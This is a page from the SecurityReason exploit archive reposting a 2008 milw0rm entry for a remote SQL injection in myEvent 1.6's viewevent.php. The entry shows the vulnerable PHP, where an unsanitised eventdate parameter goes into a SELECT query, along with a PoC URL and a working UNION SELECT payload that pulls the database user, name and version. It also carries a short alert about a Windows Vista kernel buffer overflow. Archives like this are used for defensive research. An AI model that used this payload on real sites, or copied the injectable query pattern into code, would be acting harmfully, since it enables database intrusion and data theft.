|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 4923 Milw0rm ID : 6760 Credit : JosS Date : 17.10.2008 Exploit Code : # myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability # url: http://mywebland.com/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Greetz To: All Hackers and milw0rm website vuln file: /viewevent.php vuln code: 43: if (isset($_GET['eventdate'])) xx: ... 93: $sql = "SELECT * FROM event WHERE date = '$eventdate'" ; 94: $results = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); 95: $event = mysql_num_rows($results); PoC: /viewevent.php?eventdate='[foo] Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),d atabase(),char(32,35),version())/* |
||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |